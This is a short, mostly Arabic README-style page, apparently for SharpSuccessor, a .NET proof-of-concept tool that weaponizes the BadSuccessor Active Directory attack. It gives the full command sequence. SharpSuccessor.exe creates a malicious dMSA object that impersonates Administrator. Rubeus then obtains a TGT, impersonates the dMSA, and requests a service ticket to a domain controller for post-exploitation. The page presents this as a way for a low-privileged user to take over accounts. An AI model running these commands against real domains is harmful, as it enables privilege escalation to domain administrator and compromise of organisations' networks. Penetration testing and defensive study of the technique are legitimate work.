
SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai.
SharpSuccessor هي أداة إثبات مفهوم (POC) مبنية على .NET لتسليح هجوم BadSuccessor الخاص بـ Yuval Gordon (@YuG0rd) من Akamai بالكامل. يمكن لمستخدم منخفض الامتيازات يمتلك صلاحيات CreateChild على أي وحدة تنظيمية (OU) في نطاق Active Directory مع صلاحية كتابة على كائن مستهدف تنفيذ استيلاء على الحساب.
استخدم SharpSuccessor لإضافة كائن dMSA وتجهيزه كسلاح، بالإضافة إلى كتابة السمات المناسبة على الحساب المستهدف الذي ترغب في انتحال شخصيته:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

اطلب تذكرة TGT بسياق المستخدم الحالي، في هذه الحالة jdoe:
Rubeus.exe tgtdeleg /nowrap

ثم استخدم تلك التذكرة tgt لانتحال شخصية حساب dMSA:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

يمكنك الآن طلب تذكرة خدمة بسياق Administrator لأي SPN، بما في ذلك وحدات تحكم النطاق (Domain Controllers) لمرحلة ما بعد الاستغلال. على سبيل المثال، سأعرض هنا صلاحيات الإدارة لبروتوكول SMB على وحدة تحكم النطاق:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

الآن بعد أن أصبحت التذكرة في الذاكرة، يمكننا اختبار الوصول:

جزيل الشكر لـ Jim Sykora و Garrett Foster على الإلهام والمساعدة في بناء هذه الأداة!